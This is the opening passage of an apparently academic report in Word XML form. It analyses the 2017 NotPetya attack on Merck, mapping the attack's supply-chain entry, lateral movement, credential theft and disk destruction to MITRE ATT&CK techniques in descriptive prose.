    <w:p w14:paraId="4E220841" w14:textId="77777777" w:rsidR="00E1416F" w:rsidRPr="00B40682" w:rsidRDefault="00E1416F" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C58896" w14:textId="77777777" w:rsidR="00D04F5C" w:rsidRDefault="00D04F5C" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D04F5C" w:rsidSect="00C4327F">
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BD4F2D" w14:textId="77777777" w:rsidR="003C1EBA" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E25FF" w14:textId="55261340" w:rsidR="00D04F5C" w:rsidRPr="00D04F5C" w:rsidRDefault="00D04F5C" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Abstract- This report examines modern cyber threats through a strategic analysis of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack on Merck and a practical Red Team engagement against a simulated pharmaceutical environment. Using the MITRE ATT&amp;CK framework, it identifies how supply-chain compromise, poor patch management, weak segmentation, and insufficient monitoring enabled large-scale disruption and data loss. The Red Team exercise demonstrates realistic attack paths across on-premises, cloud, and CI/CD systems, highlighting significant detection and control gaps. The report concludes with actionable, cost-effective recommendations—including Zero Trust, EDR, MFA, and improved logging—to strengthen resilience against advanced persistent threats and protect critical pharmaceutical assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F20CA" w14:textId="133646EB" w:rsidR="00D04F5C" w:rsidRPr="00D04F5C" w:rsidRDefault="00D04F5C" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Keywords- Cybersecurity, Penetration Testing, MITRE ATT&amp;CK, Red Team Engagement, Supply Chain Attack, Advanced Persistent Threat (APT), Pharmaceutical Security, Zero Trust Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F067B8D" w14:textId="14250C1B" w:rsidR="00B40682" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc216881394"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PART 1 — STRATEGIC THREAT ANALYSIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4767194C" w14:textId="5AB27F81" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00E1416F" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_heading=h.s1gnzwqxa0pb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="3" w:name="_Toc215851833"/>
      <w:bookmarkStart w:id="4" w:name="_Toc216881395"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I. Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5942581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increase in sophisticated cyberattacks on healthcare and drug-related companies indicates the exposure of these important sectors by attackers. In this paper, the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incident is used as an example to depict the process of a modern cyberattack and the reason behind the targeting of firms like Merck. Drug manufacturers have assets like priceless research, medical records, and critical logistics data, which thus become the favourites of both criminal and government-sponsored hackers. The MITRE ATT&amp;CK framework is employed in the investigation to present the attacker's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a thorough manner, to point out the weaknesses, i.e. technical, system, and human ones, which led to the breach, and to give plain suggestions that would assist in the security and resilience enhancement of organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61396DBF" w14:textId="1F35F879" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc215851834"/>
      <w:bookmarkStart w:id="6" w:name="_Toc216881396"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>II.  Overview of the Selected Cyber Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="733435F7"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Background of the Organisation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35072F0E" w14:textId="30A18A6A"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Merck &amp; Co. is a leading global pharmaceutical corporation engaged in the development of vaccines, cancer therapies, drug discovery, and large-scale biologics </w:t>
      </w:r>
      <w:r w:rsidR="006D2DE4" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[6].</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The company is present in over 140 countries and utilizes extensive research networks, manufacturing systems, clinical-trial data, and supply-chain platforms for its operations. Moreover, since the firm is involved in sensitive medical research and owns highly valuable intellectual property, it is considered an attractive target for cybercriminals as well as state-backed groups. To compound the problem, the company's information technology (IT) and operational technology (OT) infrastructures are very interconnected, meaning that a single infection with malware can propagate throughout the network rapidly. Cybersecurity incidents in critical sectors were also on the rise during 2016-2017, which posed an additional risk for companies like Merck </w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4FC55"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Summary of the Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27713753" w14:textId="625D5155"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On the 27th of June, 2017, Merck fell victim to the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malware, a malicious wiper also known as ransomware. The hackers first breached the company’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> through an infected software update delivered via the Ukrainian tax program M.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E.Doc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[7]. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">As soon as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gained access to a network, it spread quickly using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit, compromised credentials, and even remote operation tools like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and WMI </w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[1]. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">At Merck, it transitioned between the office and factory systems causing the destruction of many computers and servers. Besides that, some significant systems such as research platforms, Active Directory, and production servers were actively shut down. Merck disclosed later on that the malware had caused a global disruption and the systems had to be totally reconstructed </w:t>
      </w:r>
      <w:r w:rsidR="006D2DE4" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[8].</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attack was later pointed out to have been executed by a group linked to the Russian government by several nations </w:t>
      </w:r>
      <w:r w:rsidR="00A60841" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D643B1A"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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493C2704" w14:textId="1D6C8A62"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gave rise to a major operational turmoil at Merck that involved the cessation of vaccine production, system downs, and the slow-down of research and supply-chain activities </w:t>
      </w:r>
      <w:r w:rsidR="00072E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[6]. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Several gadgets were damaged beyond repair. The firm later on lodged a $1.4 billion insurance claim as a result of the magnitude of the incident </w:t>
      </w:r>
      <w:r w:rsidR="00B96FF4" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[4].</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The unavailability of medicines and delays in the research process were among the effects of the disruptions, which created broader risks for the healthcare sector and the patients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1A4BD" w14:textId="5A24C31E" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc215851835"/>
      <w:bookmarkStart w:id="8" w:name="_Toc216881397"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>III. MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7109A9CB"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Overview of MITRE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3C75C"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 xml:space="preserve">The MITRE ATT&amp;CK Framework is an open public, vendor-neutral directory that illustrates the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of attackers in real incidents. It simplifies what attackers intend to gain and the methods that they use at each stage of an intrusion. This is a great help to the security teams who can now convert the forensic clues into a clear timeline of events. Furthermore, applying ATT&amp;CK will also make it possible to classify the evidence easier, test the theories, and verify the effectiveness of existing detection rules or response plans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C3DC93" w14:textId="340E12A5"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In some </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> like the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attack on Merck, ATT&amp;CK assists the analysts in mapping Merck's system failures, such as the grabbing of credentials, fast spreading of SMBs, and wiping of disks to the standard techniques. This gives organizations a better understanding of the situation and what areas require improvement. It also facilitates the sharing of lessons learned, the hiding of weak points in manufacturing and research environments, and the provision of consistent naming for technical findings to insurers and legal teams </w:t>
      </w:r>
      <w:r w:rsidR="00072E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1F08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Attack Flow Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD8554C" w14:textId="7D2BE6F1" w:rsidR="0056631F" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_0"/>
          <w:id w:val="-946419125"/>
        </w:sdtPr>
        <w:sdtEndPr>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
        </w:sdtEndPr>
        <w:sdtContent>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve">The Merck incident attributed to </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>NotPetya</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> initially involved a breach of the supply chain: a malicious update to the Ukrainian tax software M.E. Doc (Initial Access). The moment the malware entered the system, it activated its destructive code and started dissemination. The malware employed the </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>EternalBlue</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> SMB exploit, together with the use of Windows tools like </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>PsExec</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> and WMI, for deployment over servers and domain controllers (Execution → Lateral Movement). Moreover, it acquired credentials by extracting LSASS memory, thus gaining access to more critical systems such as the manufacturing networks (Credential Access → Privilege Escalation). Ultimately, </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>NotPetya</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="0056631F" w:rsidRPr="00B40682">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Cardo" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> destroyed the boot records and eliminated the recovery points, making a lot of machines inoperable (Impact). This led to significant production outages, disruption of vaccine manufacturing, and protracted recovery times at Merck [14].</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="56044B2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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1D6F8ED8" wp14:editId="2982953D">
            <wp:extent cx="2828925" cy="2644775"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="22225"/>
            <wp:docPr id="203145134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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2829089" cy="2644928"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC31D2E" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc215851878"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure 1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve"> Attack Flow Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4143790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(Self-created using sources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485E89D"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MITRE TTP Mapping Across the Attack Chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039B34A"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Below </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mapped MITRE techniques tied to Merck-specific evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309FF912"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1. T1195 — Supply Chain Compromise (Initial Access)</w:t>
      </w:r>
    </w:p>
